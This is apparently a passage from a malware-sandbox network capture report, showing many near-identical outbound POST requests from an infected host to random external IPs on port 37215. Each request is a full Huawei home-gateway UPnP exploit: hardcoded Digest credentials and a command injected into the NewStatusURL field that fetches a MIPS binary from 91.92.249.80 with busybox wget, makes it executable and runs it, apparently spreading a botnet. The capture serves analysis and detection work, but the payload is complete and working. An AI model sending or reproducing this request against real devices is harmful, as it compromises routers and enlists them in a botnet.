                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          699192.168.2.235360041.88.50.437215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:46:56.216598034 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          700192.168.2.2333506197.56.20.7337215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:46:56.216600895 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          701192.168.2.2352730197.20.185.22237215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:46:56.216614008 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          702192.168.2.234394041.7.9.7237215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:46:56.217097044 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          703192.168.2.2338838197.47.80.5437215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:46:56.217107058 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          704192.168.2.2337448157.246.141.3737215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:46:56.217128992 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          705192.168.2.233312641.37.2.12937215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:46:56.217132092 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          706192.168.2.2342856100.140.156.14137215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:46:56.217150927 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          707192.168.2.2358676197.182.19.18637215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:46:56.217154980 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          708192.168.2.2352124157.64.196.14137215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:46:56.217173100 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
